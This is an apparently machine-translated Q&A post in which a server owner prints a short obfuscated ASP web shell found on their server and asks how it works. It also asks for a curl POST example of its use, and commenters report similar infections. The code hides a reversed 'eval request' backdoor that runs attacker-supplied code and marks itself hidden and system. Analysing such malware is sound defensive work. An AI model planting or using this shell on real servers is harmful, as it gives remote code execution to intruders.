我發現我的服務器,它做了一些不好的事情上有趣的惡意軟件。 現在我試圖對其進行逆向工程,但由於完全缺乏VB \ ASP的知識,我需要向您的同事求助。VB惡意軟件工具反向工程
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
據我瞭解 - 它執行一些命令並創建文件的某個地方與system \ hidden屬性。 主要問題是 - 如何使用它,即從我看到的日誌中,黑客上傳這個文件並使用POST命令。我也希望這個命令能夠理解,他如何能夠將文件上傳到某些文件夾,他應該能夠這樣做。
的任何建議都歡迎。捲曲POST樣本將是驚人的。
說,你有沒有想過如何到達那裏的惡意軟件?我剛剛在我的服務器上發現了這個(使用Adodb.Stream而不是FileSystemObject)。需要了解如何到達那裏。 – tofutim 2015-10-15 21:17:18
@tofutim我發現在一個與安全系統不佳的Windows服務器上相同...實際上不止一次在最後一年,很浪費時間:( – MattAllegro 2016-01-21 19:25:03